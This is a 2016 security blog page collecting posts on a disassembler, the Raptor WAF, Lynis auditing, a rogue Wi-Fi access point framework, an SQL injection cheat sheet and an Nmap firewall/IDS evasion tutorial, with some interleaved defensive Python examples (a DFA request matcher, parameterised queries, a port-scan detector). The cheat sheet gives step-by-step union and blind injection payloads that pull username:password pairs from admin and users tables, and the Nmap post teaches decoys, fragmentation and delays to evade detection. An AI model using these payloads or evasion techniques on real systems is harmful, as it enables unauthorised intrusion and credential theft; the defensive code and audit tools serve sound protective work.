Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc


Saturday, September 3, 2016

A Libre Cross-Platform Disassembler - Panopticon



Panopticon is a cross-platform disassembler for reverse engineering written in Rust. Panopticon has functions for disassembling, analysing, decompiling and patching binaries for various platforms and instruction sets.

Panopticon comes with a GUI for browsing control flow graphs, displaying analysis results, controlling debugger instances and editing the on-disk as well as the in-memory representation of the program.


Building
Panopticon builds with Rust stable. Aside from a working Rust 1.7 toolchain and Cargo, the only dependency you need is Qt 5.4.

Linux
Install Qt using your package manager.
Ubuntu 15.10 and 16.04:
sudo apt install qt5-default qtdeclarative5-dev \
qml-module-qtquick-controls qml-module-qttest \
qml-module-qtquick2 qml-module-qtquick-layouts \
qml-module-qtgraphicaleffects \
qtbase5-private-dev pkg-config \
git build-essential cmake
Fedora 22 and 23:
sudo dnf install qt5-qtdeclarative-devel qt5-qtquickcontrols \
qt5-qtgraphicaleffects
After that, clone the repository onto disk and use cargo to build everything.
git clone https://github.com/das-labor/panopticon.git
cd panopticon
cargo build
Gentoo:
layman -a rust
layman -f -o https://raw.github.com/das-labor/labor-overlay/master/labor-overlay -a labor-overlay

emerge -av panopticon

Windows
Install the Qt 5.4 SDK and the Rust toolchain; Panopticon can then be built using cargo build.

Running
The current version only supports AVR and has no ELF or PE loader yet. To test Panopticon you need relocated AVR code; such a file is prepared in tests/data/sosse.

Contributing
Panopticon is licensed under GPLv3 and is Free Software. Hackers are always welcome. See https://panopticon.re for our project documentation. Panopticon uses Github for issue tracking: https://github.com/das-labor/panopticon/issues

Contact
IRC: #panopticon on Freenode. Twitter: @_cibo_




Web Application Firewall using DFA - Raptor WAF v0.2



Raptor WAF is a simple web application firewall written in C following the KISS principle. For polling it uses the select() function, which is not better than epoll() or kqueue() from *BSD but is portable. The core of the match engine uses a DFA to detect XSS, SQLi and path traversal.

No more words, look at the following :


WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend against SQL injections and XSS...
  • You can block XSS, SQL injection attacks and path traversal with Raptor
  • You can use a blacklist of IPs to block some users at config/blacklist ip.txt
  • Communication works over both IPv6 and IPv4
  • Planned for the future: a DoS protector, request limits, a rule interpreter and malware detection on uploads.
  • Planned for the future: SSL/TLS...
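The DFA-based match engine described above, as an added example that is not Raptor's code: a small Aho-Corasick automaton compiled to a full transition table so that inspecting a request costs one lookup per character. The SIGNATURES dict is an assumption constructed for illustration, not Raptor's rule set, and the request is percent-decoded and lower-cased before matching so that encoded and plain forms of the same pattern land on the same signature.

```python
"""Multi-pattern DFA matcher for WAF-style request inspection (added example)."""
from collections import deque
from urllib.parse import unquote

# Constructed, minimal signature lists; an assumption for illustration only.
SIGNATURES = {
    "path_traversal": ["../", "..\\"],
    "sqli": ["' or ", "union select", "union all select", "--", "/*"],
    "xss": ["<script", "javascript:", "onerror="],
}


class SignatureDFA:
    """Aho-Corasick trie with failure links, materialised into a full DFA table."""

    def __init__(self, signatures):
        self.goto = [{}]        # trie edges: state -> {char: next state}
        self.labels = [set()]   # signature classes reported when a state is reached
        for label, words in signatures.items():
            for word in words:
                self._add(word.lower(), label)
        self._compile()

    def _add(self, word, label):
        state = 0
        for ch in word:
            if ch not in self.goto[state]:
                self.goto.append({})
                self.labels.append(set())
                self.goto[state][ch] = len(self.goto) - 1
            state = self.goto[state][ch]
        self.labels[state].add(label)

    def _compile(self):
        # Breadth-first pass: compute failure links and merge the labels of every
        # suffix state, then build the complete transition table.
        n = len(self.goto)
        fail = [0] * n
        queue = deque(self.goto[0].values())
        while queue:
            r = queue.popleft()
            for ch, s in self.goto[r].items():
                queue.append(s)
                f = fail[r]
                while f and ch not in self.goto[f]:
                    f = fail[f]
                fail[s] = self.goto[f].get(ch, 0)
                self.labels[s] |= self.labels[fail[s]]
        alphabet = {ch for edges in self.goto for ch in edges}

        def delta(state, ch):
            while state and ch not in self.goto[state]:
                state = fail[state]
            return self.goto[state].get(ch, 0)

        # Characters outside the alphabet always lead back to the root (state 0).
        self.table = [{ch: delta(s, ch) for ch in alphabet} for s in range(n)]

    def scan(self, text):
        """Return the sorted list of signature classes found anywhere in text."""
        found, state = set(), 0
        for ch in text:
            state = self.table[state].get(ch, 0)
            found |= self.labels[state]
        return sorted(found)


def normalise(request_line):
    # One round of percent-decoding plus lower-casing; double-encoded input
    # would need a second decoding pass before it is matched.
    return unquote(request_line).lower()


DFA = SignatureDFA(SIGNATURES)


def inspect_request(request_line):
    """[] means the request passes; otherwise the matched signature classes."""
    return DFA.scan(normalise(request_line))


if __name__ == "__main__":
    for line in ["GET /articles.php?id=3 HTTP/1.1",
                 "GET /files?name=%2e%2e/%2e%2e/etc/passwd HTTP/1.1"]:
        print(line, "->", inspect_request(line) or "pass")
```

The table is what makes this a DFA rather than a trie walk: after compilation there is no backtracking at scan time, which is the property a select()-driven proxy wants so that one slow request cannot stall the loop. Signature matching alone is bypassable by encodings the normaliser does not undo, so the decode step matters as much as the pattern list.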


to run:

$ git clone https://github.com/CoolerVoid/raptor_waf
$ cd raptor_waf; make; bin/raptor

Example

Start an HTTPd server on port 80
$ bin/Raptor -h localhost -p 80 -r 8883 -w 4 -o loglog.txt
You can test at http://localhost:8883/test.php

See the docs

https://github.com/CoolerVoid/raptor_waf/blob/master/doc/raptor.pdf

Tests:

Of 509 attacks, 349 were detected and blocked (68% of attacks blocked)



Steps to create your WAF(web application firewall) in C

Following the usual definition (as in OWASP's), a WAF is a piece of software intended to protect a web application at the application level. Nowadays a WAF is not defined by the web application it protects: it is not a customized solution specific to that application but, similarly to a general software firewall, one that contains parameters to protect against intrusion across a wide variety of frameworks and code bases. To clear things up: there is overlap between the different types of firewalls. Software and hardware firewalls are used in their own right to protect networks; WAFs, with their specialized function for web applications, can take the form of either of those two main types. By default, a firewall uses a blacklist, protecting against individual, previously logged attacks. Additionally, it can also use a whitelist, specifying the allowed users and interactions for the application. Another function is blocking SQL injection and XSS attacks... In another context, WAFs can create random tokens and put them in forms to try to block web robots and automated attacks; this practice can help mitigate CSRF pitfalls. Before you ask "How can I do it?", I have to bring you some principles, the theory behind the facts...


There are two common kinds of WAF:

1- One uses a plugin in the HTTPd to get information about the data INPUT or OUTPUT; before the request finishes, it inspects the request and blocks certain contents. This approach focuses on the HTTP methods POST, GET...


2- The other, my favorite, is an independent reverse proxy server: it receives all requests from the client, the proxy performs some analysis on the content and, if it does not block, sends all the information on to the external server...


Number one is cold: this path is not fully portable. Another bad thing is that you need to create a different plugin for each HTTPd, one for Apache, another for NGINX, IIS, lighttpd... It's not cool! If you are not a good low-level programmer, you can try Python's Twisted; it is easy to make a reverse proxy with it, but it is not a good way, because it does not have good performance in production. If that bothers you, study Stevens' book on sockets. OK, the title of this post is "create a WAF in C": the task is fully done here, commented and with some documentation in LaTeX. Relax, you can get it in this repository:



Security Auditing Tool for Unix/Linux Systems - Lynis 2.3.2



We are excited to announce this major release of the auditing tool Lynis. Several big changes have been made to core functions of Lynis. These changes are the next step in the simplification improvements we have been making. There is a risk of breaking your existing configuration.

Lynis is an open source security auditing tool, used by system administrators, security professionals, and auditors to evaluate the security defenses of their Linux and UNIX-based systems. It runs on the host itself, so it performs more extensive security scans than vulnerability scanners.

Supported operating systems

The tool has almost no dependencies, therefore it runs on almost all Unix based systems and versions, including:
  • AIX
  • FreeBSD
  • HP-UX
  • Linux
  • Mac OS
  • NetBSD
  • OpenBSD
  • Solaris
  • and others
It even runs on systems like the Raspberry Pi and several storage devices!

Installation optional

Lynis is light-weight and easy to use. Installation is optional: just copy it to a system, and use "./lynis audit system" to start the security scan. It is written in shell script and released as open source software (GPL). 

How it works

Lynis performs hundreds of individual tests to determine the security state of the system. The security scan itself consists of performing a set of steps, from initializing the program up to the report.

Steps
  1. Determine operating system
  2. Search for available tools and utilities
  3. Check for Lynis update
  4. Run tests from enabled plugins
  5. Run security tests per category
  6. Report status of security scan
Besides the data displayed on screen, all technical details about the scan are stored in a log file. Any findings (warnings, suggestions, data collection) are stored in a report file.

Opportunistic scanning

Lynis scanning is opportunistic: it uses what it can find.
For example, if it sees you are running Apache, it will perform an initial round of Apache-related tests. When during the Apache scan it also discovers an SSL/TLS configuration, it will perform additional auditing steps on that. While doing that, it will collect the discovered certificates, so they can be scanned later as well.

In-depth security scans

By performing opportunistic scanning, the tool can run with almost no dependencies. The more it finds, the deeper the audit will be. In other words, Lynis will always perform scans which are customized to your system. No audit will be the same!

Use cases

Since Lynis is flexible, it is used for several different purposes. Typical use cases for Lynis include:
  • Security auditing
  • Compliance testing (e.g. PCI, HIPAA, SOx)
  • Vulnerability detection and scanning
  • System hardening

Resources used for testing

Many other tools use the same data files for performing tests. Since Lynis is not limited to a few common Linux distributions, it uses tests from standards and many custom ones not found in any other tool.
  • Best practices
  • CIS
  • NIST
  • NSA
  • OpenSCAP data
  • Vendor guides and recommendations (e.g. Debian, Gentoo, Red Hat)

Lynis Plugins

Plugins enable the tool to perform additional tests. They can be seen as an extension (or add-on) to Lynis, enhancing its functionality. One example is the compliance checking plugin, which performs specific tests only applicable to some standard.


Changelog

Categories and Groups

Tests are now grouped by their focus area and named 'groups' accordingly. Besides groups, each test will belong to a category (performance, privacy, or security).
Commands: lynis show categories, lynis show groups
Options: --tests-from-category, --tests-from-group
Note: You might need to change your scripts if you previously defined the group of tests to scan.

Development

A new 'strict' option is available in the profiles and by default enabled for the initialization phases of Lynis. It will perform a strict code check for the tests, to detect any uninitialized variables, improving code quality.

Helpers

With 'lynis update check' you can now check for updates. This is the preferred new method.
The command 'lynis show changelog' allows reviewing the changes. Optionally a release can be specified as additional argument.

Languages

An initial translation for German has been contributed by Kai Raven. The Italian translation is by Stefano Marty (stefanomarty), and the Hungarian translation by Zoltan Paldi (paldiz).

Profiles

Parsing of the profiles has been improved, which prevented some settings from overriding default settings.

Tests

  • AUTH-9212 - Added prerequisite to log
  • AUTH-9216 - Simplified test and make it more efficient
  • AUTH-9218 - Clean ups and improve readability
  • AUTH-9226 - Style, text, and removed warning
  • AUTH-9228 - Provide just a suggestion instead of warning
  • AUTH-9268 - Improve test for readability
  • AUTH-9328 - Test /etc/profile.d for umask setting
  • AUTH-9406 - Readability and code style changes
  • CONT-8102 - Determine if all Docker tests should be performed
  • DBS-1880 - Initial support for Redis server
  • HTTP-6720 - Readability improvement of test
  • KRNL-5830 - Readability and style improvements, ignore rescue images
  • MAIL-8818 - Style and refactoring
  • PHP-2211 - Readability improvement and code style changes
  • PHP-2374 - Changed text and cleanups
  • PHP-2376 - Log result to log file instead of report
  • PKGS-7383 - Simplified test
  • PKGS-7388 - Style and readability improvements
  • TIME-3106 - Corrected string to test for status
  • TOOL-5102 - Split of fail2ban tests
  • TOOL-5104 - Test for enabled fail2ban jails

Languages

  • Translation of Spanish (es) added
  • Proper display of text strings when accented characters are used
  • More text strings added

General

  • Added bold and header as new colors
  • Changed header and footer of screen output
  • Allow atomic tests to be skipped (e.g. SSH-7408)
  • Extended tests database with category (lynis show tests)
  • By default Lynis will now run in 'quick mode' and not break after each section. You can get this behavior by adding the --wait option.

Functions

  • RemoveColors - New test to clear colors
  • DisplayError - Display error on screen in uniform format and colors. Use an optional exit code to quit the program
  • SkipAtomicTest - This function is now properly working with lowercase strings

Website

Several controls on the website are added or updated, including:

  • FILE-6344
  • FINT-4315
  • FINT-4402
  • HTTP-6714
  • MACF-6234
  • NAME-4018
  • NAME-4402
  • PHP-2374
  • PROC-3612
  • TIME-3106



    Thursday, September 1, 2016

    Tonight Mr. Robot is Going to Reveal ‘Dream Device For Hackers’

    Mr. Robot is the rare show that provides a realistic depiction of hacks and vulnerabilities that are at the forefront of cyber security. This is the reason it’s been the most popular TV show of its kind.

    Throughout season 1 and season 2, we have seen that connected devices are the entry point of choice of Elliot and fsociety to breach networks and traditional security controls.

    Pwn Phone On Mr. Robot Show


    In this week’s episode, Elliot uses a Pwnie Express Pwn Phone, which he describes as “a dream device for pentester,” to run a custom script he has written to take over someone else’s phone.

    Security pros have long known about the Pwn Phone as a powerful mobile platform for penetration testing and security assessments, so it is not surprising to see it on Mr. Robot.

    The coolest part is that Pwnie Express is giving away a Pwn Phone, just like the one used in the show.

    The Pwn Phone is a mobile pentesting device that makes it incredibly easy to evaluate wired, wireless and Bluetooth networks. It is built on Kali Linux that comes pre-packaged with over 100 built-in and ‘one-click’ tools, and it can run third-party scripts.

    The Pwn Pad exists for security pros who want a tablet version, and it’s also available via the Android Open Pwn Project.

    The Pwn Phone is the latest in a series of connected device hacks on Mr. Robot that have included a Femtocell, a Raspberry Pi, and Bluetooth sniffers, along with the hack of an E-Corp exec’s connected home and the crucial meltdown of E-Corp’s data center by using a connected HVAC system.

    These are real threats that are being exploited by criminals to gain unauthorized access and steal data from companies today.

    In the past, Pwnie has made it clear that they do not condone the criminal use of penetration testing tools and devices. But pentesting is important, and having the tools to do it properly is part of that process.

    Sometimes you need to break things to find and fix serious security vulnerabilities in the devices and networks that permeate nearly every facet of our daily lives. The bad guys have every tool available to them; white hats should be equally well-equipped.

    And as for what Elliot does in the show?

    He’s a pretty well-established gray character. Is he good? Or is he bad?

    Either way, it was pretty cool.

    Source: The Hacker News

    OffensiveSec

    Monday, August 29, 2016

    Framework for Rogue Wi-Fi Access Point Attack - WiFi-Pumpkin v0.8.1



    Framework for Rogue Wi-Fi Access Point Attack

    Description
    WiFi-Pumpkin is an open source security tool that provides a rogue access point for Man-in-the-Middle and network attacks.

    Installation
    Kali 2.0 / WifiSlax 4.11.1 / Parrot 3.0.1 / 2.0.5
    • Python 2.7
    git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
    cd WiFi-Pumpkin
    ./installer.sh --install
    Refer to the wiki for installation.

    Features
    • Rogue Wi-Fi Access Point
    • Deauth Attack Clients AP
    • Probe Request Monitor
    • DHCP Starvation Attack
    • Credentials Monitor
    • Transparent Proxy
    • Windows Update Attack
    • Phishing Manager
    • Partial Bypass HSTS protocol
    • Support beef hook
    • Mac Changer
    • ARP Poison
    • DNS Spoof
    • Patch Binaries via MITM

    Plugins
    Plugin - Description
    net-creds - Sniff passwords and hashes from an interface or pcap file
    dns2proxy - This tool offers different features for post-exploitation once you change the DNS server of a victim.
    sslstrip2 - Sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks; this version is based on the fork by @LeonardoNve/@xtr4nge.
    sergio-proxy - Sergio Proxy (a Super Effective Recorder of Gathered Inputs and Outputs) is an HTTP proxy that was written in Python for the Twisted framework.
    BDFProxy-ng - Patch Binaries via MITM: BackdoorFactory + mitmProxy; bdfproxy-ng is a fork and review of the original BDFProxy by @secretsquirrel.

    Transparent Proxy
    Transparent proxies let you intercept and manipulate HTTP/HTTPS traffic, modifying requests and responses, which allows injecting JavaScript into the pages the targets visit. You can easily implement a module that injects data into pages by creating a Python file in the "Proxy" directory; it will automatically be listed on the PumpProxy tab.

    Plugins Example
    The following is a sample module that injects some contents into the <head> tag to set a blur filter on the body of the HTML page:
    import logging
    from Plugin import PluginProxy
    from Core.Utils import setup_logger

    class blurpage(PluginProxy):
        ''' this module proxy sets a blur on the body of the HTML page response '''
        _name = 'blur_page'
        _activated = False
        _instance = None
        _requiresArgs = False

        @staticmethod
        def getInstance():
            # one shared plugin instance
            if blurpage._instance is None:
                blurpage._instance = blurpage()
            return blurpage._instance

        def __init__(self):
            self.injection_code = []

        def LoggerInjector(self, session):
            # every injected page is recorded in the access point log
            setup_logger('injectionPage', './Logs/AccessPoint/injectionPage.log', session)
            self.logging = logging.getLogger('injectionPage')

        def setInjectionCode(self, code, session):
            self.injection_code.append(code)
            self.LoggerInjector(session)

        def inject(self, data, url):
            # the style block is placed right after the opening <head> tag
            injection_code = '''<head> <style type="text/css">
    body{
    filter: blur(2px);
    -webkit-filter: blur(2px);}
    </style>'''
            self.logging.info("Injected: %s" % (url))
            return data.replace('<head>', injection_code)

    Screenshots

    • Kali Linux 2.0

    • kubuntu 15.10 

    • Parrot OS


    FAQ
    FAQ on the wiki



    Sunday, August 28, 2016

    Full SQL Injections - Cheatsheet



    [1]* -Introducing The SQL Injection Vuln:

    SQL injection attacks are also known as SQL insertion.
    They take the form of executing some queries in the database and getting access to information (SQL version, number and names of tables and columns, some authentication info, etc...)

    [2]* -Exploiting SQL Injection Vuln :

    Before proceeding to the exploitation of SQL injections we have to check for this vulnerability, so here we have an example


    http://www.website.com/articles.php?id=3

    to check for the vulnerability we have to add ' (a quote) to the URL; let's see together


    http://www.website.com/articles.php?id=3'

    now, if we get an error like this: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."

    this website is vulnerable to SQL injection, and if we don't get anything we can't exploit this vulnerability.

    Now, let's go on to exploiting this vuln and finding some information about this SQL database


    certainly, before doing anything we have to find the number of columns

    [-] Finding the number of columns:

    to find the number of columns we use ORDER BY to order the results in the database

    let's see that,


    http://www.website.com/articles.php?id=3 order by 1/*

    and if we don't get any error we try to change the number


    http://www.website.com/articles.php?id=3 order by 2/*

    still no error, so we continue to change the number


    http://www.website.com/articles.php?id=3 order by 3/*

    no error too


    http://www.website.com/articles.php?id=3 order by 4/*

    no error


    http://www.website.com/articles.php?id=3 order by 5/*

    yeah, here we get this error (Unknown column '5' in 'order clause')

    so, this database has 4 columns because the error is at 5

    now, we try to check whether the UNION function works or not

    [-] Checking UNION function :

    by using the UNION function we select more information from the database in one statement

    so we try this


    http://www.website.com/articles.php?id=3 union all select 1,2,3,4/* (it ends with 4 because we have seen that the number of columns is 4)

    now, if we see some numbers in the page like 1 or 2 or 3 or 4, the UNION function works

    if it does not work we try to change the /* to --

    so we have this


    http://www.website.com/articles.php?id=3 union all select 1,2,3,4--

    after checking the UNION function and seeing that it works well, we try to get the SQL version

    [-] Getting SQL Version :

    now we have a number on the screen after checking the UNION

    say, for example, that this number is 3

    so we replace 3 with @@version or version()


    http://www.website.com/articles.php?id=3 union all select 1,2,@@version,4/*

    and now we have the version on the screen!

    let's go now and get the table and column names


    [-] Getting tables and columns names :

    here we have a job to do!!

    if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...)

    let's check that the table admin exists!


    http://www.website.com/articles.php?id=3 union all select 1,2,3,4,5 from admin/*

    and here we see the number 3 that we had on the screen

    now we know that the table admin exists

    here we have to check column names:


    http://www.website.com/articles.php?id=3 union all select 1,2,username,4,5 from admin/*

    if we get an error we have to try another column name

    and if it works we get the username displayed on screen (example: admin, moderator, super moderator...)

    after that we can check if the column password exists

    we have this


    http://www.website.com/articles.php?id=3 union all select 1,2,password,4,5 from admin/*

    and oops! we see the password on the screen as a hash or as text

    now we have to use 0x3a to get the information like this: username:password, admin:unhash...


    http://www.website.com/articles.php?id=3 union all select 1,2,concat(username,0x3a,password),4,5 from admin/*


    this is the simple SQL injection; now we will go on to blind SQL injection (more difficult)


    [3]* -Exploiting Blind SQL Injection Vuln :

    first we should check if the website is vulnerable, for example


    http://www.website.com/articles.php?id=3

    and to test the vulnerability we have to use


    http://www.website.com/articles.php?id=3 and 1=1 ( we don't get any error and the page loads normally)

    and now


    http://www.website.com/articles.php?id=3 and 1=2

    here we have some problems with text, pictures and some contents! and that's good! this website is vulnerable to Blind SQL Injection

    we have to check the MySQL version

    [-] Getting MySQL Version :

    we use substring in blind injection to get the MySQL version


    http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=4

    we should replace the 4 with 5 if the version is 5


    http://www.website.com/articles.php?id=3 and substring(@@version,1,1)=5


    and now if the select function does not work we should use a subselect, and we should test if it works

    [-] Testing if subselect works :


    http://www.website.com/articles.php?id=3 and (select 1)=1 ( if the page loads normally the subselect works fine)

    and now we have to see if we have access to mysql.user


    http://www.website.com/articles.php?id=3 and (select 1 from mysql.user limit 0,1)=1 (if it loads normally we have access to mysql.user)

    now, we can check table and column names

    [-] Checking table and column names :


    http://www.website.com/articles.php?id=3 and (select 1 from users limit 0,1)=1

    if the page loads normally with no errors, the table users exists

    now we need a column name


    http://www.website.com/articles.php?id=3 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

    if the page loads normally with no errors, the column password exists

    now we have the table and the column; yeah, we can exploit the vulnerability now


    http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

    the page loads normally with no errors, so we need to change the 80 to get an error


    http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>90

    no errors! we continue


    http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

    Yeah!! an error

    the character is char(99). we use the ASCII converter and we know that char(99) is the letter 'c'

    to test the second character we change ,1,1 to ,2,1


    http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

    http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

    the page loads normally


    http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

    the page loads normally, higher !!!


    http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

    error! lower number


    http://www.website.com/articles.php?id=3 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

    Error that we were searching for!!

    now, we know that the second character is char(105), which is 'i' with the ASCII converter. We have 'ci' now from the first and the second characters

    our tutorial draws to a close!

    Thank you for reading and I hope that you have understood SQL injection and the exploitation of this vulnerability.
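The quote test and the "and 1=1" / "and 1=2" probes used above, run through a dynamic query and a parameterised one side by side, as an added example that is not part of the tutorial: the articles table, its three rows and the in-memory SQLite back end are constructed here. The point for the defender is the right-hand column: once the value is validated and bound, the same inputs neither raise a syntax error nor change which rows come back.

```python
"""Dynamic SQL beside a parameterised query, against constructed SQLite data."""
import sqlite3


def make_db():
    """Constructed sample data standing in for the tutorial's articles table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)",
                     [(1, "first"), (2, "second"), (3, "third")])
    return conn


def fetch_dynamic(conn, user_id):
    """Vulnerable: the request parameter is pasted into the statement text,
    so whatever follows the number is parsed as SQL."""
    sql = "SELECT id, title FROM articles WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def fetch_parameterised(conn, user_id):
    """Hardened: validate the type, then bind the value. The statement text
    never changes, so the input cannot alter the query's logic."""
    try:
        article_id = int(user_id)
    except ValueError:
        return []
    return conn.execute("SELECT id, title FROM articles WHERE id = ?",
                        (article_id,)).fetchall()


def outcome(fetch, conn, user_id):
    """'error' if the database rejects the statement, else the row count."""
    try:
        return len(fetch(conn, user_id))
    except sqlite3.Error:          # the tutorial's "error in your SQL syntax" case
        return "error"


# The probe values are the ones the tutorial uses against ?id=3.
PROBES = ["3", "3'", "3 and 1=1", "3 and 1=2"]


def compare(conn=None):
    """Run every probe through both query styles.
    Returns {probe: (dynamic_outcome, parameterised_outcome)}."""
    conn = conn or make_db()
    return {p: (outcome(fetch_dynamic, conn, p),
                outcome(fetch_parameterised, conn, p)) for p in PROBES}


if __name__ == "__main__":
    for probe, (dyn, param) in compare().items():
        print(f"{probe!r:14} dynamic={dyn!s:6} parameterised={param}")
```

The dynamic column reproduces the oracle the blind section relies on (one row for "and 1=1", none for "and 1=2"); the parameterised column returns one row for "3" and nothing for every other probe, so there is no error message to read and no true/false difference to measure. Rejecting non-integer input before it reaches the database is what removes both signals.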

    Source: www.exploit-db.com

    By OffensiveSec

    Firewall and IDS Evasion / Bypassing the Firewalls and IDS/IPS - NMAP Scanning Tutorial





    This post is for penetration testers who face issues with scanning corporate networks that have firewalls deployed and are unable to bypass the firewall or an IDS/IPS.
    A firewall is generally software or hardware that protects a private network from a public network. This is a trouble maker for penetration testers, as they are not able to bypass this added layer of security.
    Well, the good news here is that we can use Nmap options to bypass firewalls and IDS/IPS.
    If a penetration tester can bypass the firewall then half the game is won. In this tutorial you will learn how to bypass and test a firewall using the Nmap options.


    NMAP options to Bypass the Firewall :



    -f (fragment packets):

    This option makes the packets harder to detect. By specifying this option once, Nmap will split the packet into 8 bytes or less after the IP header. This makes the detection of packets sent by Nmap more difficult.

    --mtu:

    With this option, you can specify your own fragmentation packet size. The Maximum Transmission Unit (MTU) must be a multiple of eight or Nmap will give an error and exit. This helps in firewall evasion.

    -D (decoy):

    By using this option, Nmap will send some of the probes from the spoofed IP addresses specified by the user. The idea is to mask the true IP address of the user in the log files; the user's IP address is still in the logs. You can use RND to generate a random IP address or RND:<number> to generate <number> random IP addresses. The hosts you use as decoys should be up, or you will flood the target. Also remember that by using many decoys you can cause network congestion, so you may want to avoid that, especially if you are scanning your client's network.

    --source-port <portnumber> or -g (spoof source port):

    This option is useful if the firewall is set up to allow all incoming traffic that comes from a specific port.

    --data-length:

    This option changes the default data length sent by Nmap in order to avoid being detected as an Nmap scan.

    --max-parallelism:

    This option is usually set to one in order to instruct Nmap to send no more than one probe at a time to the target host.

    --scan-delay <time>:

    This option can be used to evade an IDS/IPS that uses a threshold to detect port scanning activity. Setting the scan delay is always a good idea when you want to evade any security device.
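The threshold-based detection that the --scan-delay option is meant to slip past, from the defender's side, as an added example (not from Nmap or this post): a sliding-window detector that counts distinct destination ports per source over constructed firewall log lines, whose format is an assumption rather than any real device's syslog layout. Run with a short window it flags only the fast scanner; run with a long window it also catches the one pacing its probes 15 seconds apart, which is the complementary check a rate threshold alone does not give.

```python
"""Port-scan detection over constructed firewall log lines (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed log layout: "<iso timestamp> <DROP|ACCEPT> src=<ip> dst=<ip> dport=<port>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>DROP|ACCEPT) src=(?P<src>\S+) dst=\S+ dport=(?P<dport>\d+)$")


def build_sample_log():
    """Constructed log: a fast scanner, a paced scanner (one port every 15 s,
    the --scan-delay pattern) and an ordinary HTTPS client."""
    base = datetime(2016, 9, 3, 10, 0, 0)
    events = []
    for i in range(30):                                   # 30 ports within 6 s
        events.append((base + timedelta(seconds=i // 5), "10.0.0.5", 1 + i, "DROP"))
    for i in range(30):                                   # 30 ports over 435 s
        events.append((base + timedelta(seconds=100 + 15 * i), "10.0.0.9", 1 + i, "DROP"))
    for i in range(60):                                   # port 443 only
        events.append((base + timedelta(seconds=i), "10.0.0.7", 443, "ACCEPT"))
    events.sort()
    return [f"{ts.isoformat()} {action} src={src} dst=10.0.0.1 dport={dport}"
            for ts, src, dport, action in events]


def parse(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    return datetime.fromisoformat(m["ts"]), m["src"], int(m["dport"])


class DistinctPortDetector:
    """Alerts when one source touches at least `threshold` distinct destination
    ports inside any span of `window_seconds`."""

    def __init__(self, window_seconds, threshold):
        self.window = timedelta(seconds=window_seconds)
        self.threshold = threshold
        self.events = defaultdict(deque)                    # src -> (ts, dport) queue
        self.ports = defaultdict(lambda: defaultdict(int))  # src -> dport -> count

    def observe(self, ts, src, dport):
        queue, counts = self.events[src], self.ports[src]
        queue.append((ts, dport))
        counts[dport] += 1
        while ts - queue[0][0] > self.window:             # expire old events
            _, old_port = queue.popleft()
            counts[old_port] -= 1
            if counts[old_port] == 0:
                del counts[old_port]
        return len(counts) >= self.threshold


def detect(lines, window_seconds, threshold):
    """Return the set of sources that tripped the detector (lines in time order)."""
    det = DistinctPortDetector(window_seconds, threshold)
    flagged = set()
    for line in lines:
        parsed = parse(line)
        if parsed and det.observe(*parsed):
            flagged.add(parsed[1])
    return flagged


SAMPLE_LOG = build_sample_log()

if __name__ == "__main__":
    print("10 s window, 15 ports:", detect(SAMPLE_LOG, 10, 15))
    print("1 h window, 20 ports: ", detect(SAMPLE_LOG, 3600, 20))
```

With a 10-second window the paced scanner never has more than one port in view, exactly the blind spot the --scan-delay paragraph describes; a second detector with an hour-long window and a higher threshold sees all 30 ports and still leaves the port-443 client alone. Distinct-port counting rather than raw packet rate is what keeps the ordinary client from tripping either one.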

    Source: Nmap.org

    OffSec 

    http://nmap.org/book/man-bypass-firewalls-ids.html
    Copyright © Offensive Sec Blog | Powered by OffensiveSec